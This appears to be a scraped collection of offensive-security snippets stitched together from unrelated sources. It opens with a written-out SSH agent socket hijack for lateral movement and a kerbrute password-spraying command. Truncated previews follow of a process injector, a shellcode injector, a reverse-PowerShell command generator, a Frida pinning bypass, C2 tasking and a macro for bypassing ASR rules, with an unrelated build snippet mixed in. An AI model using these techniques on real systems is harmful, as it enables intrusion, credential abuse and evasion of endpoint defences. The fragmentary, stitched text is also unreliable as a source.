Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]
user@internal:~$ hostname -f
internal.company.tld
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
33927885 33m-subdomain-wordlist.txt
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| /* Android ssl certificate pinning bypass script for various methods | |
| by Maurizio Siddu | |
| Run with: | |
| frida -U -f <APP_ID> -l frida_multiple_unpinning.js [--no-pause] | |
| */ | |
| setTimeout(function() { | |
| Java.perform(function() { | |
| console.log(''); |
| <!-- Useful when bundling an app using Microsoft.EntityFrameworkCore.Sqlite, which depends on SQLitePCLRaw.bundle_green, which depends on SQLitePCLRaw.lib.e_sqlite3.v110_xp (having native Windows dlls) --> | |
| <ItemGroup> | |
| <EmbeddedResource Include="$(NugetPackageRoot)\sqlitepclraw.lib.e_sqlite3.v110_xp\1.1.13\runtimes\win-x86\native\e_sqlite3.dll"> | |
| <Link>costura32\e_sqlite3.dll</Link> | |
| </EmbeddedResource> | |
| <EmbeddedResource Include="$(NugetPackageRoot)\sqlitepclraw.lib.e_sqlite3.v110_xp\1.1.13\runtimes\win-x64\native\e_sqlite3.dll"> | |
| <Link>costura64\e_sqlite3.dll</Link> | |
| </EmbeddedResource> | |
| </ItemGroup> |
| # | |
| # Demonstrate how to queue tasks to execute with each checkin... | |
| # | |
| # | |
| # yield tells a function to pause and return a value. The next time the same instance of the | |
| # function is called, it will resume after where it last yielded. | |
| # | |
| sub stuffToDo { | |
| # Tasks for first checkin |
| #!/usr/bin/env python3 | |
| # | |
| # generate reverse powershell cmdline with base64 encoded args | |
| # | |
| import sys | |
| import base64 | |
| def help(): | |
| print("USAGE: %s IP PORT" % sys.argv[0]) |
| /* Author: TheWover | |
| Description: Injects embedded base64-encoded shellcode into an arbitrary hardcoded process using native Windows 32 API calls. | |
| Last Modified: 11/1/2018 | |
| */ | |
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace ShellcodeTest |
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |